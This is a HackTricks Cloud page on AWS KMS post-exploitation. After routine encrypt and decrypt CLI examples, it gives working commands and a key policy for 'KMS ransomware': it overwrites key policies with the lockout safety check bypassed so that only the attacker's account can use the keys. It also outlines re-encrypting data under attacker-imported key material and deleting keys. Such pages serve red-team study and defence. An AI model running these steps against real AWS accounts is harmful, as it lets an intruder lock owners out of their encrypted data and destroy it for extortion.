HackTricks Cloud
HackTricks Training Twitter Linkedin Sponsor

AWS - KMS Post Exploitation

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

KMS

For more information check:

pageAWS - KMS Enum

Encrypt/Decrypt information

  • Using a symmetric key

# Encrypt data
aws kms encrypt \
    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
    --plaintext fileb:///tmp/hello.txt \
    --output text \
    --query CiphertextBlob | base64 \
    --decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
    --ciphertext-blob fileb://ExampleEncryptedFile \
    --key-id f0d3d719-b054-49ec-b515-4095b4777049 \
    --output text \
    --query Plaintext | base64 \
    --decode

  • Using a asymmetric key:

# Encrypt data
aws kms encrypt \
    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
    --encryption-algorithm RSAES_OAEP_SHA_256 \
    --plaintext fileb:///tmp/hello.txt \
    --output text \
    --query CiphertextBlob | base64 \
    --decode > ExampleEncryptedFile

# Decrypt data
aws kms decrypt \
    --ciphertext-blob fileb://ExampleEncryptedFile \
    --encryption-algorithm RSAES_OAEP_SHA_256 \
    --key-id d6fecf9d-7aeb-4cd4-bdd3-9044f3f6035a \
    --output text \
    --query Plaintext | base64 \
    --decode

KMS Ransomware

An attacker with privileged access over KMS could modify the KMS policy of keys and grant his account access over them, removing the access granted to the legit account.

Then, the legit account users won't be able to access any informatcion of any service taht has been encrypted with those keys, creating an easy but effective ransomware over the account.

Note that AWS managed keys aren't affected by this attack, only Customer managed keys.

Also note the need to use the param --bypass-policy-lockout-safety-check (the lack of this option in the web console makes this attack only possible from the CLI).

# Force policy change
aws kms put-key-policy --key-id mrk-c10357313a644d69b4b28b88523ef20c \
    --policy-name default \
    --policy file:///tmp/policy.yaml \
    --bypass-policy-lockout-safety-check

{
    "Id": "key-consolepolicy-3",
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "arn:aws:iam::<your_own_account>:root"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}

Note that if you change that policy and only give access to an external account, and then from this external account you try to set a new policy to give the access back to original account, you won't be able.

Generic KMS Ransomware

Global KMS Ransomware

There is another way to perform a global KMS Ransomware, which would involve the following steps:

  • Create a new key with a key material imported by the attacker

  • Re-encrypt older data encrypted with the previous version with the new one.

  • Delete the KMS key

  • Now only the attacker, who has the original key material could be able to decrypt the encrypted data

Destroy keys

# Destoy they key material previously imported making the key useless
aws kms delete-imported-key-material --key-id 1234abcd-12ab-34cd-56ef-1234567890ab

# Schedule the destoy of a key (min wait time is 7 days)
aws kms schedule-key-deletion \
    --key-id arn:aws:kms:us-west-2:123456789012:key/1234abcd-12ab-34cd-56ef-1234567890ab \
    --pending-window-in-days 7

Note that AWS now prevents the previous actions from being performed from a cross account:

Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!

Other ways to support HackTricks:

PreviousAWS - IAM Post ExploitationNextAWS - Lambda Post Exploitation

Last updated